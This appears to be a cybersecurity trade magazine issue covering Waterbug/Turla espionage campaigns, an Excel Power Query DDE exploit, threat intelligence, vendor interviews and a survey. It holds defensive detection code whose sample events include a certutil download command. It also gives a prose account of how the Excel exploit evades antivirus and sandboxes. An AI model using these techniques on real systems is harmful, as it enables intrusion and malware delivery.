4. Opportunistic sowing of confusion: If a false flag operation wasn’t planned from the start, it is possible that Waterbug discovered the Crambus intrusion while preparing its attack and opportunistically used it in the hopes of sowing some confusion in the mind of the victim or investigators. Based on recent leaks of Crambus internal documents, its Poison Frog control panel is known to be vulnerable to compromise, meaning it may have been a relatively trivial diversion on the part of Waterbug to hijack Crambus’s infrastructure. A compromise conducted by one threat actor group through another’s infrastructure, or fourth party collections, has been previously discussed in a 2017 white paper by Kaspersky researchers.
WATERBUG LIKELY COMPROMISED THE C&C NETWORK INFRASTRUCTURE OF CRAMBUS
FURTHER CAMPAIGNS
Waterbug has also mounted two other campaigns over the past year, each of which was characterized by separate tools. These campaigns were wide ranging, hitting targets in Europe, Latin America, and South Asia.
In the first campaign, Waterbug used two versions of a custom loader named javavs.exe (64-bit) and javaws.exe (32-bit), to load a custom backdoor named PhotoBased.dll and run the export function GetUpdate on the victim’s computers. The backdoor will modify the registry for the Windows Media Player to store its C&C configuration. It also reconfigures the Microsoft Sysinternals registry to prevent pop-ups when running the PsExec tool. The backdoor has the capability to download and upload files, execute shell commands, and update its configuration.
In the second campaign, Waterbug used an entirely different backdoor, named securlsa.chk. This backdoor can receive commands through the RPC protocol. This RPC backdoor also included source code derived from the tool PowerShellRunner, which allows a user to run PowerShell scripts without executing powershell.exe, therefore the user may bypass detection aimed at identifying malicious PowerShell usage.
While both campaigns involved distinct tools during the initial compromise phase, there were also many similarities. Both were characterized by the use of a combination of custom malware and publicly available tools. Also, during both campaigns Waterbug executed multiple payloads nearly simultaneously, most likely to ensure overlapping access to the network if defenders found and removed one of the backdoors.
Waterbug took several steps to avoid detection. It named Meterpreter as a WAV file type, probably in the hope that this would not raise suspicions. The group also used GitHub as a repository for tools that it downloaded post-compromise. This too was likely motivated by a desire to evade detection, since GitHub is a widely trusted website. It used Certutil.exe to download files from the repository, which is an application whitelist bypass technique for remote downloads.
In one of these campaigns, Waterbug used a USB stealer that scans removable storage devices to identify and collect files of interest. It then packages stolen files into a password-protected RAR archive. The malware then uses WebDAV to upload the RAR archive to a Box account.
UNANSWERED QUESTIONS
This is the first time Symantec has observed one targeted attack group seemingly hijack and use the infrastructure of another group. However, it is still difficult to ascertain the motive behind the attack. Whether Waterbug simply seized the opportunity to create confusion about the attack or whether there was more strategic thinking involved remains unknown. Waterbug’s ever-changing toolset demonstrates a high degree of adaptability by a group determined to avoid detection by staying one step ahead of its targets. Frequent retooling and a penchant for flirting with false flag tactics have made this group one of the most challenging adversaries on the targeted attack landscape.
PROTECTION/MITIGATION
Symantec has the following protection in place to protect customers against these attacks:
FILE-BASED PROTECTION
• Backdoor.Whisperer
• Hacktool.Mimikatz
THREAT INTELLIGENCE
The DeepSight Managed Adversary and Threat Intelligence (MATI) team co-authored this blog and its customers have received intelligence with additional details about these campaigns, the characteristics of the Waterbug (aka Turla) cyber espionage group, and methods of detecting and thwarting activities of this adversary.
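Three of the evasion techniques described above leave artefacts a defender can hunt for: Certutil.exe used to download and decode files, PowerShell run without powershell.exe, and a payload given a .wav extension. The following is an added example, not Symantec's detection logic; the event layout, host names, rule names and sample records are constructed for illustration, and the list of legitimate PowerShell hosts is an assumption to be tuned per environment.

```python
import ntpath
import re

# Rule 1: certutil invoked to fetch or decode a file rather than to manage certificates.
CERTUTIL_FLAGS = re.compile(r"(?i)(?:^|\s)[-/](urlcache|verifyctl|decode|decodehex)\b")
# Rule 2: the PowerShell engine assembly loaded by a process that is not a PowerShell host.
PS_ENGINE_DLLS = {"system.management.automation.dll",
                  "system.management.automation.ni.dll"}
PS_HOSTS = {"powershell.exe", "powershell_ise.exe", "pwsh.exe"}  # assumption: extend locally

GAC = r"C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation"

# Constructed Sysmon-style records: id 1 = process creation, id 7 = image load.
SAMPLE_EVENTS = [
    {"id": 1, "host": "WS01", "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": r"certutil.exe -urlcache -split -f https://example.invalid/t.txt C:\ProgramData\t.txt"},
    {"id": 1, "host": "WS01", "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": r"certutil -decode C:\ProgramData\t.txt C:\ProgramData\t.bin"},
    {"id": 1, "host": "WS02", "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": r"certutil -hashfile C:\Temp\setup.msi SHA256"},
    {"id": 7, "host": "WS03", "image": r"C:\Windows\System32\svchost.exe",
     "loaded": GAC + r"\System.Management.Automation.dll"},
    {"id": 7, "host": "WS03",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "loaded": GAC + r"\System.Management.Automation.dll"},
]


def base(path):
    """Lower-cased file name of a Windows path (works on any OS)."""
    return ntpath.basename(path).lower()


def check_event(ev):
    """Return the name of the rule an event matches, or None."""
    if ev["id"] == 1 and base(ev["image"]) == "certutil.exe":
        if CERTUTIL_FLAGS.search(ev["cmdline"]):
            return "certutil-download-or-decode"
    if ev["id"] == 7 and base(ev["loaded"]) in PS_ENGINE_DLLS:
        if base(ev["image"]) not in PS_HOSTS:
            return "ps-engine-in-unexpected-host"
    return None


def triage(events):
    """Return (host, rule) for every event that matches a rule, in input order."""
    hits = []
    for ev in events:
        rule = check_event(ev)
        if rule:
            hits.append((ev["host"], rule))
    return hits


def looks_like_wav(header):
    """True if the first bytes of a file carry the RIFF/WAVE container signature."""
    return len(header) >= 12 and header[0:4] == b"RIFF" and header[8:12] == b"WAVE"


def suspicious_wav(name, header):
    """Flag files named *.wav whose content is not a RIFF/WAVE container."""
    return name.lower().endswith(".wav") and not looks_like_wav(header)


if __name__ == "__main__":
    for host, rule in triage(SAMPLE_EVENTS):
        print(host, rule)
    # Constructed headers: a real WAV prefix and an opaque encoded blob.
    print(suspicious_wav("chime.wav", b"RIFF\x24\x00\x00\x00WAVEfmt "))
    print(suspicious_wav("update.wav", b"\x8f\x1c\x02\xaa\x41\x10\x9e\x77\x03\x55\x21\x0c"))
```

Matching on the image name alone misses a renamed copy of certutil.exe, so pair rule 1 with the binary's original-file-name metadata where the telemetry records it. Rule 2 needs a baseline first, because some legitimate management software also hosts the PowerShell engine.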
TOP EXECUTIVE
GEORGE EAPEN, GROUP CISO, PETROFAC
YOU GOT TO HAVE IT ‘RIGHT’
With more than 14 years of experience in the cyber security industry, George Eapen, Group CISO of Petrofac, shares with Cyber Sentinels the key tools required for a CISO.
BY: DIVSHA BHAT <divsha@gecmediagroup.com>
Petrofac is a leading international service provider to the oil and gas production and processing industry. With around 11,500 employees, Petrofac operates out of seven strategically located operational centres, in Aberdeen, Sharjah, Abu Dhabi, Woking, Chennai, Mumbai and Kuala Lumpur and has a further 24 offices worldwide. In 2018, Petrofac generated almost $6 billion of revenue. Mr. George Eapen, Group CISO, manages Petrofac’s cyber security risks. With 14 years of experience in the industry, George previously worked as a CISO for GE International covering their global regions outside of the US.
Across the globe, the cybersecurity skill gap is nothing new. The nature and severity of this skills gap fosters debate across the industry. Most importantly, the cybersecurity skill gap has grown to almost three million globally, contributing to concerns around attracting and retaining sufficient skills in the cybersecurity industry. George’s view is: “The MENA region is filled with cybersecurity experts. But what we lack is not the quantity but the quality of people with the RIGHT skills. A person may have a cybersecurity certification but if he or she does not have a specific skill to do the job, if the right attitude, it would be of no use to the organization. My general observation is that there are people around but with missing skills.”
TOP PRIORITIES
• Ensuring that the Enterprise IT is secure
• Ensure correct regulatory compliance methods
• Taking care of my Team
THE RIGHT TOOLS THAT EVERY BUSINESS NEEDS
Sound security begins with knowing the right skills and tools. Cybersecurity is something that every business needs to take seriously. With major hacking attacks in the region, affecting all sizes of businesses, it is important to be aware of the dangers. Having the right tools in place with highly skilled resources to combat cyber threats is extremely vital. George believes that in a phase at present where the risk landscape is changing and hackers are using sophisticated methods for attacks, CISOs must be up to date with the latest technologies. “Ensuring that the company is protected should be the key mantra of any CISO. Staying compliant with regulations of multiple countries is also important if the company is a multi-national company like Petrofac.” As a Group CISO, George makes sure to stay compliant with the regulations of all the jurisdictions the Group is operating in.
THE KEY SKILLS
Cybersecurity is a vast domain to build expertise in various security subjects like identity and access management, endpoint protection, etc. But George says that the key skill any CISO needs is the presence of mind. “He or she should be a clear thinker and good communicator who can articulate business or cyber risk in a simple language that non-cyber or non-IT people understand. By ensuring that one is not breaking the existing operations or making employee experience difficult, they should always balance the act,” he comments. Also, undoubtedly, being a CISO is not a stress-free job. Having passion to stretch yourself to go the extra mile is necessary. To keep up with ever-changing technical challenges, training and certifications on various security subjects is a must. “Staying up to date with the latest happenings in the cyber security field, attending workshops and seminars, networking with other cyber security professionals for exchange of ideas are some of the skills required for a CISO. Personally, I feel any organization should consider the most knowledgeable security person when it comes to cybersecurity,” he says. “In the present era, we are always connected to the internet. So, there is no risk-free environment. Besides being the gatekeeper of the company, one should be an excellent messenger as well who can articulate cyber risks to the leadership.”
DIGITAL TRANSFORMATION – BUT ARE YOU SECURED?
With emerging technologies like Internet of Things (IoT), Blockchain, and Artificial Intelligence, George sees digital transformation as inevitable. “Organizations are striving for better productivity and operational efficiency with the same or lesser number of resources to stay ahead of competition. But there is no point in digital transformation if you cannot keep it secure. The role of the CISO is to make sure to have the right controls in place while ensuring that the company is protected,” he says. Giving a perfect example, he says, the job of a CISO is like applying brakes while the car is moving. A CISO is confident and drives the organization faster if he knows he is well protected by the brakes (security solutions). He will never push the accelerator or abruptly use the brakes in a way that might damage the car (company). “We know there is a control and we can slow down whenever needed for new initiatives.”
UPSIDE AND DOWNSIDE OF CYBERSECURITY SOLUTIONS
George says that any CISO wouldn’t look for solutions for their business based on the brand, relationships or a particular product’s popularity. “A solution which can solve my problem is what I look for. I implement a solution if it solves our purpose and bridges the gap in our organization. Implementing technologies blindly is not my option.” In spite of his busy schedule, George makes time to meet vendors and channel partners as he believes that it educates him about the new technologies and solutions. “I only focus on the vendors/solutions that solve my issues. I know the market is filled with new technologies and solutions every day but I won’t look at implementing everything that’s out there. Building a relationship with vendors or at the least maintaining it is good for future opportunity and gives us options.”
VENDOR TALKS
MINIMIZING THE THREAT LANDSCAPE THROUGH AUGMENTING HUMAN SECURITY TEAMS
Today’s security threats are evolving each day, with security teams having to monitor everything from the data centre to the edge, as well as the millions of connected devices which log in to their systems each year. The workplace is currently in flux – we can work from mobile devices in any location we choose as well as working with many different applications. When things change, security teams have to readjust policies and controls. Is it fair to expect them to chase after us, all day, every day to keep us safe? CIOs can no longer ignore the high-profile attacks that continue to threaten organisational reputations around the world. It’s no wonder that security is the top of the agenda in many boardrooms or that a new C, the CISO (Chief Information Security Officer), has joined the management team. Protecting the organisation is obviously a huge priority. But how is this actually achievable, unless we are able to anticipate the small, but significant, changes that are happening on the network day to day? If we are asking human security teams to constantly monitor the data being shared by incoming and existing devices, which can easily reach into the thousands for a large enterprise, then we are creating security systems that lack the ability to scale in line with the threats. Because human teams can get tired and make mistakes (they are human), the most common approach is to make blanket rules and restrictions across the network to serve as a catch-all against new inbound threats. The problem here is that very quickly the user experience suffers, which in turn can affect productivity, and even morale. This is where machine learning comes to the aid of human security teams.
RABIH ITANI, REGIONAL BDM - SECURITY MIDDLE EAST & TURKEY, ARUBA, A HPE COMPANY
AUGMENTING, NOT REPLACING
With machine learning, there is an ability to detect minute changes in data that would likely slip through traditional defences. Using machine learning for NTA (Network Traffic Analysis) and UEBA (User and Entity Behavioural Analytics), we are able to set historical and peer baselines for every single device connecting to the network, from the latest user mobile device to the air conditioning unit connected as part of a new IoT initiative. Everything is quickly recognised, profiled and connected, giving each connected entity its own unique risk profile and its current risk score. As soon as a device behaves in a way that strays outside of its recognised profile or baseline, the network sees it, and takes action. This action could be to raise the risk, re-route the data for deeper analysis to confirm if the anomaly is malicious or immediately raise an alert, which compels human security teams into action. Assuming there is no wrongdoing, the user experience is not impacted, beyond perhaps being asked to confirm the activity was indeed them and all is OK. In case the anomaly itself is confirmed to be malicious based on discrete attack analytics, or in case a full Kill Chain is confirmed, the NAC (Network Admission Control) systems can be triggered with manual or even automated response to quarantine the device from the rest of the network in order to limit any potential damage that might have occurred. All because the machine is analysing millions of individual packets of data and thousands of systems logs, all the time. It’s a job that no human team can realistically do, or would want to do.
With machine-led security continually learning, adjusting baselines and detecting new threat patterns, human teams are not usurped. They are enormously aided, by being alerted only to the issues that they really need to inspect. This automatic monitoring offers security staff exceptional time savings, which actually means an improvement to their job role. Instead of fighting fires, security teams will be able to focus on building better IT experiences across their organisation, and saying yes to new innovations. Security teams may actually become a revenue driver for the business.
HOW SECURITY IMPACTS THE WORKPLACE
The tasks of human security workers may well change as the world of machine learning, building to full AI, begins to accelerate. But we should never fear change. Especially when the likely new roles carry even wider business relevance. The promise of machine learning is there, but it still needs highly skilled teams to build it into the core of the network, re-apply it to other business areas, and proactively monitor it for new insights. We’re faced by intelligent threats, targeting valuable user data, across a network that has more end points (and entry points) than can be counted. Isn’t it about time we acknowledge that human security staff need the help they can get?
REAL-LIFE
EXPLOIT USING MICROSOFT EXCEL POWER QUERY FOR REMOTE DDE EXECUTION DISCOVERED
Mimecast Threat Center discovered a weakness in the Microsoft Excel tool that allows embedding malicious payloads remotely. Mimecast Threat Center found and developed a technique that uses a feature in Microsoft Excel called Power Query to dynamically launch a remote Dynamic Data Exchange (DDE) attack into an Excel spreadsheet and actively control the payload through Power Query.
Power Query is a powerful and scalable Business Intelligence (BI) tool that lets users integrate their spreadsheets with other data sources, such as an external database, text document, another spreadsheet, or a web page, to name a few. When sources are linked, the data can be loaded and saved into the spreadsheet, or loaded dynamically (when the document is opened, for example).
Mimecast Threat Center found that Power Query could also be used to launch sophisticated, hard-to-detect attacks that combine several attack surfaces. Using Power Query, attackers could embed malicious content in a separate data source, and then load the content into the spreadsheet when it is opened. The malicious code could be used to drop and execute malware that can compromise the user’s machine. The feature gives such rich controls that it can be used to fingerprint a sandbox or a victim’s machine even before delivering any payloads. The attacker has potential pre-payload and pre-exploitation controls and could deliver a malicious payload to the victim while also making the file appear harmless to a sandbox or other security solutions.
Mimecast worked with Microsoft as part of the Coordinated Vulnerability Disclosure (CVD) process to determine if this is an intended behavior for Power Query, or if it was an issue to be addressed. Microsoft declined to release a fix at this time and instead offered a workaround to help mitigate the issue. What follows is a detailed walkthrough of a potential exploit using Power Query to launch a DDE exploit that could drop and execute a payload from a file-sharing site.
THREATS USING POWER QUERY AS AN ATTACK SURFACE
Because Power Query is a powerful tool within Microsoft Excel, the potential threat for abusing the feature is great. If exploited, it can be used to launch sophisticated attacks that combine several potential attack surfaces, from local privilege escalation, DDE attacks and remote code execution exploits. The Power Query feature is designed to allow you to embed remote content easily and dynamically. Such attacks are usually hard to detect and give threat actors more chances to compromise the victim’s host. Using the potential weakness in Power Query, attackers could potentially embed any malicious payload that, as designed, won’t be saved inside the document itself but downloaded from the web when the document is opened.
To demonstrate how Power Query can be used to launch a DDE exploit, an external webpage hosting the payload was loaded into the spreadsheet, and a custom, simple HTTP server was written to host the payload on a web page to be served. The HTTP server listened locally on port 80 and served DDE content as a response when a request was received from the spreadsheet.
[Figure: The remote content is fetched and loaded into the spreadsheet.]
A Wireshark capture was used to see the attack flow. The marked packets showed the DDE formula, the DNS request for “dropbox.com”, where payload.exe was stored, and the HTTPS session that delivered the payload.
ANALYZING THE FILE FORMAT
Upon examination of the file format, we saw that “table/table1.xml” was created with the properties “name: “localhost”” (default) and “type: “queryTable.”” The link between the table and the specific query table properties was described in the “.rels” stream (“_rels/table1.xml.rels”), which contained a field named “target” that pointed to “../queryTables/queryTable1.xml.” The queryTable1.xml contained data linking to “connection.xml” (which gathers all document connection properties) using the “connectionId” field under “<queryTable>.” The connection was made with the dbPr object using the “Select *” command. The web query itself was stored in the “xl\customXL\item1” document and was encoded in base64.

To make the DDE run, the user is required to double click the cell that loads the DDE and to then click again to release it. Those operations will trigger the DDE and launch the payload that was received from the web.
BYPASSING THE NEED TO DOUBLE CLICK – ENABLING AUTOMATED EXECUTION
To bypass the “click for run” issue, it was discovered that in old versions of Microsoft Office there are some differences in the “Get External Data>> From Web” implementation. As mentioned, “dbPr” is created when using Microsoft Office 2016, and the user is required to act to activate the payload (in some cases, such as sandboxes, those clicks can cause a sandbox bypass). When “Get External Data>> From Web” is used in older versions of Office (e.g., 2010), the object created under “Connections.xml” is not “dbPr” as mentioned earlier but “webPr,” which is much simpler. Unlike “dbPr,” “webPr” does not require any user actions to run the payload.
BYPASSING AVS AND SANDBOXES USING THE EXPLOITED POWER QUERY TOOL
Headers were added to the web request (query) so that the payload could bypass anti-virus and sandboxing capabilities designed to block exactly this kind of malicious content. The web server served up malicious content only when a specific HTTP header was present in the request. The anti-virus extracted the URL of the HTTP server from the file but did not parse the headers. When the AV sent a test request, the server knew this was from the AV and not the spreadsheet. The DDE will be served only when the “Referer” HTTP header is set to “www.google.com.” Otherwise, the content won’t be served. The specific web header was set by using Power Query in “Advanced” mode, and Power Query performed the web request with the requested “Referer” header. If another application tries to partially simulate the Power Query behavior and doesn’t request the web page with the right “Referer” header, it will not receive the payload; the payload is served only when the original document is opened using the Microsoft Excel application.

Since the sandbox would also send the custom header as part of the request, a new way to avoid detection was needed. The “auto refresh” and “refresh” intervals in Power Query were used instead, avoiding malicious content that could potentially mark this file as malware by forcing the file to refresh data when opening the file and removing data from the external data range before saving. Those properties ensure that the payload in the file will update when the file is opened. The file was set to refresh every minute (the minimum time), and the payload was served at the 10th query. This means every sandbox that executed the file in less than 10 minutes would never get the payload. In the case of the example provided, most of the static-analyzing AVs won’t detect the file (which doesn’t contain the payload), and sandboxes or other security solutions that download the content only once or twice will miss it as well.
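The connection properties described in the file-format and refresh sections above can be audited statically, since the file never contains the payload itself. The following Python check is an added example, not code from the original article or from Mimecast: it opens a workbook as a ZIP container and reports every connection, flagging “webPr” entries and refresh-on-open or timed-refresh settings. The part name xl/connections.xml and the attributes refreshOnLoad and interval are the standard SpreadsheetML names rather than names given in the article, and both sample workbooks are constructed inline.

```python
import io
import zipfile
import xml.etree.ElementTree as ET

SML = "http://schemas.openxmlformats.org/spreadsheetml/2006/main"
NS = {"m": SML}
PART = "xl/connections.xml"   # standard SpreadsheetML part name
MAX_PART_BYTES = 1_000_000    # refuse oversized parts (zip-bomb guard)


def make_sample(connection_xml):
    """Build a constructed, minimal .xlsx container holding only connections.xml."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(PART, f'<connections xmlns="{SML}">{connection_xml}</connections>')
    return buf.getvalue()


# Constructed samples: an older-Office style web query set to refresh on open and
# every minute, and an Office 2016 style Power Query connection.
SAMPLE_WEBPR = make_sample(
    '<connection id="1" name="Connection" type="4" refreshedVersion="6" '
    'interval="1" refreshOnLoad="1"><webPr sourceData="1" url="http://localhost/"/>'
    '</connection>')
SAMPLE_DBPR = make_sample(
    '<connection id="1" name="Query - localhost" type="5" refreshedVersion="6">'
    '<dbPr connection="Provider=Microsoft.Mashup.OleDb.1;Location=localhost" '
    'command="SELECT * FROM [localhost]"/></connection>')


def is_true(value):
    # SpreadsheetML booleans are written as "1"/"0" or "true"/"false".
    return value in ("1", "true")


def audit_connections(xlsx_bytes):
    """Return one finding (dict) per data connection declared in the workbook."""
    with zipfile.ZipFile(io.BytesIO(xlsx_bytes)) as zf:
        if PART not in zf.namelist():
            return []                      # no external data connections
        if zf.getinfo(PART).file_size > MAX_PART_BYTES:
            raise ValueError("connections part is unexpectedly large")
        raw = zf.read(PART)
    if b"<!DOCTYPE" in raw:                # OOXML parts must not carry a DTD
        raise ValueError("DTD found in connections part")
    findings = []
    for conn in ET.fromstring(raw).findall("m:connection", NS):
        web, db = conn.find("m:webPr", NS), conn.find("m:dbPr", NS)
        kind = "webPr" if web is not None else "dbPr" if db is not None else "other"
        interval = int(conn.get("interval", "0"))
        reasons = []
        if kind == "webPr":
            reasons.append("webPr web query: runs without user action per the article")
        if db is not None and "Microsoft.Mashup" in db.get("connection", ""):
            reasons.append("Power Query connection: review the query source")
        if is_true(conn.get("refreshOnLoad")):
            reasons.append("refreshes when the workbook is opened")
        if interval:
            reasons.append(f"re-fetches every {interval} minute(s)")
        findings.append({
            "name": conn.get("name"),
            "kind": kind,
            "url": web.get("url") if web is not None else None,
            "refresh_on_load": is_true(conn.get("refreshOnLoad")),
            "interval_minutes": interval,
            "reasons": reasons,
        })
    return findings


if __name__ == "__main__":
    for label, sample in (("webPr", SAMPLE_WEBPR), ("dbPr", SAMPLE_DBPR)):
        for finding in audit_connections(sample):
            print(label, finding["name"], finding["reasons"])
```

A mail gateway or triage script can treat any finding with a non-empty reasons list as grounds to hold the attachment for review, since a single sandbox fetch may not observe what a later refresh returns.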
WORKAROUND AND CLOSING
The Mimecast Threat Center team reached out to the Microsoft Security Response Center (MSRC) with our information and a working proof of concept. MSRC opened a case, but Microsoft decided not to fix this behavior, and their response included a workaround: either using a Group Policy to block external data connections or using the Office Trust Center to achieve the same. MSRC accepted our request to publish this research per the CVD policy.

Microsoft published an advisory (4053440) that provides steps and procedures regarding security settings for Microsoft Office applications. This advisory provides guidance on what users can do to ensure that these applications are properly secured when processing Dynamic Data Exchange fields.

Attackers are looking to subvert the detections that victims have. While there is a chance that this kind of attack may be detected over time as threat intelligence is shared between various security experts and information sharing platforms, Mimecast strongly recommends all Microsoft Excel customers implement the workarounds suggested by Microsoft, as the potential threat to these Microsoft users is real and the exploit could be damaging.
TOP OF MIND
LEVERAGING CTI TO BENEFIT ORGANISATIONS’ SECURITY POSTURE
Over the last year, we have seen the CTI community growing and diversifying; as a result, the way threat intelligence is being used has also evolved. However, a survey conducted by SANS, sponsored by ThreatQuotient, recently revealed that 1 out of 5 companies are still unsure of CTI’s value to their organisation.

COLLABORATE WITH GOVERNMENTS AND ISACS

CTI analyses information about the intent, capabilities and opportunities of adversaries in cyberspace. It is a valuable resource for organisations and for individuals in roles that require being prepared for the wide range of threats their organisation is facing. To help organisations realise the value of CTI, we compiled a list of benefits this resource can bring:
TRACKING THREAT BEHAVIOURS
Security organisations tend to consider intelligence as an indicator feed. They’re not wrong, but CTI can offer so much more value than that. Not only does it help to enrich alerts with technical details about specific attacks and campaigns, it is also a source of information around threat behaviours and adversary TTPs. Encouragingly, 27% of the SANS survey’s respondents perceived this as the greatest value to their threat detection and response. As organisations become more familiar with threat behaviours, adversary TTPs and how to leverage them, these figures will certainly continue to rise.

IDENTIFY DIGITAL FOOTPRINT OR ATTACK SURFACE IDENTIFICATION
It comes as no surprise therefore that 81% of organisations have seen their security and response improve since they started producing or leveraging CTI. Organisations that are unsure about the impact of CTI on their security and response should consider, and measure, the average resolution time of security incidents when CTI analysts participate and compare those times to when they didn’t. This would help them to appreciate how much it has enriched not only the understanding of security incidents and response but also the process, allowing issues to be resolved quicker.
FIND A SHARING PARTNERSHIP THAT WILL BENEFIT YOUR ORGANISATION
ANTHONY PERRIDGE, VP OF INTERNATIONAL, THREATQUOTIENT
We mention collaboration above, and CTI shows even more value as it isn’t limited to the private sector. Indeed, security teams also have the opportunity to share their intelligence and collaborate with their peers in the government and other public entities. Collaboration with the latter can be done through an Information Sharing and Analysis Centre (ISAC), a non-profit organisation providing a central resource to gather information related to cyber threats to critical infrastructure. Such a centre is based on a two-way sharing of information between the private and public sector. Surprisingly, the SANS survey revealed that this smart way to make the most of the intelligence and better defend against threats has only seduced 40% of organisations. The biggest value propositions of CTI coming from governments and ISACs perceived by these were the timely and relevant threat information, points of contact at member organisations and advocacy in the community for security.

A GROWING INTEREST FROM THE PUBLIC SECTOR
In recent years, we have seen a growing interest in collaborating and sharing information amongst security teams. As a result of this trend, multiple solutions have emerged providing organisations with the right tools to tackle cyber threats, such as threat library, endpoint detection and penetration testing. Beyond the data being shared, information sharing programmes have a wide range of benefits. From points of contact to advocacy for security and best practices, participating in an information-sharing group provides a secure and confidential environment for organisations to increase situational awareness and reduce the impact on organisations.

Whilst sources of government CTI are multiplying, only half of the community is actually taking advantage of it. Yet, governments have matured their own understanding of private sector cyber threats over the last years. They can now give additional context and track adversary behaviours including their tactics, techniques and procedures (TTPs), and don’t have to only rely on indicators of compromise (IoCs) anymore. The problem with IoCs is that they gained a lot of attention on the market even though they simply indicate computer intrusions. In a nutshell, they tend to be too generic to provide long-term and strategic intelligence value.
TOP OF MIND
ADDRESSING THE CYBER WARFARE OF THE FUTURE
RAJIV SINGH, GLOBAL HEAD OF CYBERSECURITY, TECH MAHINDRA

How does Tech Mahindra ensure that the customer’s business is secured against national grade threats and attacks?
With an increase in the cyber security incidents, it is becoming crucial for organizations to secure networks and protect data. Tech Mahindra has developed the World’s First AI-Powered Predictive Cyber Risk Platform that can predict and proactively avoid cyber-breaches by continuously monitoring IT inventories and take appropriate mitigating steps. We have also partnered with an Israel based startup to develop advanced cybersecurity solutions like cybercrime investigation, cybercrime policing and analytics. Furthermore, Tech Mahindra has signed a Memorandum of Understanding (MOU) with Indian Institute of Technology Kanpur (IIT Kanpur) to collaborate and co-create superior research based solutions in cyber security. Tech Mahindra’s national-grade cybersecurity capability and expertise across industries addresses the cyber warfare of the future. Tech Mahindra will enable the companies to design and deliver bespoke Security Operation Centres (C-SOCs), Computer Emergency Response Teams (CERTs) and Forensic Laboratories, leveraging the state-of-the-art automation and orchestration tools, Artificial Intelligence (AI) and Machine learning analytics (ML) and best of breed technology. We also offer consultation, training and managed security services, based on national grade methodologies and procedures, and develop future ready technologies to meet the evolving challenges of the cyber domain. Our global experience of securing Enterprise and Telecom customers provides a great opportunity to build customized cybersecurity products in the space of Advanced Threat Management, Internet of Things (IoT), 5G, connected devices and securing Internet of Everything in our digital world.

Brief our readers about your innovative solutions and services.
With over 17 years of domain experience, Tech Mahindra’s Enterprise Security & Risk Management Services team is a trusted advisor – consultant, systems integrator and program project manager. We are taking an end to end ownership of the solution platform being proposed and manage of Enterprises.
Tech Mahindra’s Enterprise Security & Risk Management (ESRM) portfolio of services includes:
• Advanced Threat Management
• Cloud Security
• Application Security
• IoT Security
• OT Security services in Manufacturing, Automotive, Utilities and Energy Verticals
• Identity & Access Management
• Governance Risk & Compliance

The customized services for Customers include the following:
• Threat Monitoring, Analytics and Incident Management
• Security Infrastructure Device Management
• VA-PT, Security-Assurance, Vulnerability-Management
• Brand Monitoring and Protection Services
• SOC in a Box, Compliance Audit, Identity & Access Management
• Threat-Analysis, Risk Assessment, General Data Protection Regulation (GDPR) as a Service
• Security Audit/Strategy
• Cloud Security Monitoring
• ETDR as a Service

Tech Mahindra has created Automated Security Assurance platform (ASAP) which provides Continuous Assurance on Compliance and Risk management for the Board of Directors of the customers.

How do you plan to develop internal capabilities to handle cybersecurity solutions?
While AI, Machine Learning and Deep Learning have been largely employed by Security Device OEM’s (Original Equipment Manufacturer), at the same time adversaries are also brewing AI based tactics and techniques to launch attacks. While we defend AI based solutions from cyber attacks, it is equally important to secure the data analytics from such incidents. We recommend counter insurgency measures to detect adversaries AI based attacks to simultaneously defeat and address its root causes. Several sandboxing environments are built to detect underlying malwares launched by adversaries based on AI based techniques. Military grade deception technologies are deployed to deceive AI based attempts on critical assets. We leverage MITRE’s Kill Chain analysis that demonstrates more than 400+ adversaries attack behaviors that includes AI and Machine Learning. In the event of AI based attacks propagating the assets, Tech Mahindra proposes an agent based Incident and Forensics handlers to detect and prevent propagation of attacks on other machines. We can automatically conduct forensics on infected machines, isolate the machine from the network, inspect the malware and build counter measures. Tech Mahindra proposes pro-active measures based on NIST principles (Identify, Protect, Detect, Respond and Recover). Protect gears include file less memory based attack detection at runtime. AES 256 encryption both at Data, at Rest and in Transit, Distributed Denial-of-Service (DDoS) protection for critical servers. Tech Mahindra also recommends periodic Vulnerability Assessment and Penetration Testing to discover known threats based on common vulnerability exposure.

What are your plans for the Middle East region with 2020 coming in next year?
Due to strategic and economic significance of The Gulf Corporation Council (GCC) region, it has become the centre point for cyber attacks. The government organizations as well as sectors like Banking, Financial Services and Insurance (BFSI), energy and utilities are more prone to cyber security breach and that has led to an uptake in the demand for better security products. Tech Mahindra would like to help circumvent from cyber espionage, cyberattack and help in business continuity, compliance management and help in the brand reputation of Middle Eastern companies.
SURVEY
INFORMATION SECURITY SURVEY 2018
In 2018 SearchInform held a number of seminars, conducting a Road Show in 4 regions worldwide. South Africa, the Middle East and North Africa, Latin America and CIS have taken part in the annual anonymous survey presenting the relevant level of data risk awareness and expertise from across 10 industries, including IT, power engineering, manufacturing and transport, finance and banking, retail, hospitality, healthcare, state defense, logistics and construction. 15 countries have shared their experience and methods introduced to protect the corporate network.
WHICH SOLUTIONS ARE INSTALLED TO PROTECT A CORPORATE NETWORK
[Chart. Categories: Antivirus; Firewall/Proxy; Administration tools for Windows; DLP; IDS/IPS; SIEM; Spam filters; Data is not protected. Percentages shown: 93%, 79%, 78%, 29%, 23%, 12%, 11%, 1%.]
WHICH CHANNELS ARE CONTROLLED
Email: 73%
External storage devices: 48%
Telephony: 35%
Documents sent to print: 29%
Messengers: 26%
Cloud storage: 25%
All: 8%
WHICH INFORMATION WAS LEAKED IN 2017-2018
Trade secret: 35%
Technical information: 17%
Personal data: 16%
WHO APPEARS TO BE A VIOLATOR
[Chart. Categories: Employees; Accountant/economist/financier; Managers; Assistant manager/secretary; IT specialists. Percentages shown: 59%, 21%, 19%, 16%, 15%.]
WHICH SANCTIONS ARE IMPOSED
[Chart. Categories: Dismissal; Fine/Cutting bonuses; Prosecution; Reprimand; No sanctions. Percentages shown: 49%, 34%, 32%, 12%, 8%.]
ARE THERE ANY CORPORATE REGULATIONS INTRODUCED
Employees sign a non-disclosure agreement: 77%
There are no regulations: 18%

DO CLIENTS OR MEDIA SOURCES GET INFORMED ABOUT A LEAK?
No, a leak is not announced: 49%
Yes, clients get informed: 21%
Yes, a media announcement is made: 3%
THE NUMBER OF LEAKS INCREASED IN 2018
Yes: 15%
No: 58%

